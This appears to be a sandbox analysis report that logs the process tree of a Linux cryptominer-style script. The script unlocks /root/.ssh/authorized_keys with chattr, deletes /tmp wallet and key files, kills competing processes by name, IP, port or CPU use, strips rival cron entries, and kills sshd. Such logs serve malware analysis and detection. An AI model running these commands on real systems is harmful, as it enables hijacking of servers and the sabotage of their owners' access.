                                                                                                                                                                                                                                                                                        chattr -iae /root/.ssh/
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                        PID:815
                                                                                                                                                                                                                                                                                      • /usr/bin/chattr
                                                                                                                                                                                                                                                                                        chattr -iae /root/.ssh/authorized_keys
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:816
                                                                                                                                                                                                                                                                                        • /bin/rm
                                                                                                                                                                                                                                                                                          rm -rf "/tmp/addres*"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:817
                                                                                                                                                                                                                                                                                          • /bin/rm
                                                                                                                                                                                                                                                                                            rm -rf "/tmp/walle*"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:818
                                                                                                                                                                                                                                                                                            • /bin/rm
                                                                                                                                                                                                                                                                                              rm -rf /tmp/keys
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:819
                                                                                                                                                                                                                                                                                              • /bin/ps
                                                                                                                                                                                                                                                                                                ps aux
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                PID:820
                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                grep /dot
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:821
                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:822
                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:823
                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                      PID:824
                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                      pkill -f hezb
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                      PID:825
                                                                                                                                                                                                                                                                                                    • /bin/ps
                                                                                                                                                                                                                                                                                                      ps aux
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                      PID:826
                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                      grep tracepath
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:827
                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                        grep -v grep
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:828
                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                          awk "{print \$2}"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:829
                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                            PID:830
                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                            pkill -f /tmp/.out
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                            PID:831
                                                                                                                                                                                                                                                                                                          • /bin/ps
                                                                                                                                                                                                                                                                                                            ps aux
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                            PID:832
                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                            grep ./ll1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:833
                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                              grep -v grep
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:834
                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:835
                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                  PID:836
                                                                                                                                                                                                                                                                                                                • /bin/ps
                                                                                                                                                                                                                                                                                                                  ps aux
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                  PID:837
                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                  grep -i "[a]liyun"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                  PID:838
                                                                                                                                                                                                                                                                                                                • /bin/ps
                                                                                                                                                                                                                                                                                                                  ps aux
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                  PID:839
                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                  grep -i "[y]unjing"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                  PID:840
                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                  grep 185.71.65.238
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:842
                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:843
                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                      awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:844
                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                        PID:845
                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                        grep 140.82.52.87
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:847
                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:848
                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:849
                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                              PID:850
                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                              grep 207.38.87.6
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:852
                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:853
                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:854
                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                    grep -v -
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:855
                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                      PID:856
                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                      grep 34.81.218.76:9486
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:858
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                        awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:859
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                          awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:860
                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                            grep -v -
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:861
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:862
                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                grep 42.112.28.216:9486
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:864
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                  awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:865
                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:866
                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:867
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                        PID:868
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                        pkill -f .git/kthreaddw
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                        PID:869
                                                                                                                                                                                                                                                                                                                                                      • /bin/ps
                                                                                                                                                                                                                                                                                                                                                        ps aux
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                        PID:870
                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                        grep agetty
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:871
                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                          grep -v grep
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:872
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                            awk "{if(\$3>80.0) print \$2}"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:873
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                              • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                              PID:874
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                              pkill -f 42.112.28.216
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                              PID:875
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:876
                                                                                                                                                                                                                                                                                                                                                              • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                sed /192.81.212.13/d
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:877
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                  crontab -
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                  PID:878
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:879
                                                                                                                                                                                                                                                                                                                                                                  • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                    sed /base64/d
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:880
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                      crontab -
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                      • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                      PID:881
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:882
                                                                                                                                                                                                                                                                                                                                                                      • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                        sed /python/d
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:883
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                          crontab -
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                          PID:884
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:885
                                                                                                                                                                                                                                                                                                                                                                          • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                            sed /shm/d
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:886
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                              crontab -
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                              PID:887
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:888
                                                                                                                                                                                                                                                                                                                                                                              • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                sed /postgresql/d
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:889
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                  crontab -
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                  PID:890
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:891
                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                    sed /cloudfronts/d
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:892
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                      crontab -
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                      PID:893
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:894
                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                        sed /sshd/d
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:895
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                          crontab -
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                          PID:896
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:897
                                                                                                                                                                                                                                                                                                                                                                                          • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                            sed /linux/d
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:898
                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                              crontab -
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                              PID:899
                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:900
                                                                                                                                                                                                                                                                                                                                                                                              • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                sed /neoogilvy/d
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:901
                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                  crontab -
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                  PID:902
                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:903
                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                    sed /rsync/d
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:904
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                      crontab -
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                      PID:905
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:906
                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                        sed /bpdeliver/d
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:907
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                          crontab -
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                          PID:908
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                          pkill -f sshd
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                          PID:909
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                          pkill -f htop
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                          PID:910
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                          pkill -f linuxsys
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                          PID:911
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                          pkill -f kthreaddo
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                          PID:912
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                          pkill -f donkey
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                          PID:913
                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                          grep :1414
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:915
                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                            awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:916
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                              awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:917
                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:918
                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:919
                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                    grep 127.0.0.1:52018
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:921
                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:922
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                        awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:923
                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:924
                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:925
                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                            grep :143
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:927
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:928
                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:929
                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:930
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:931
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                      grep :2222
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:933
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                        awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:934
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
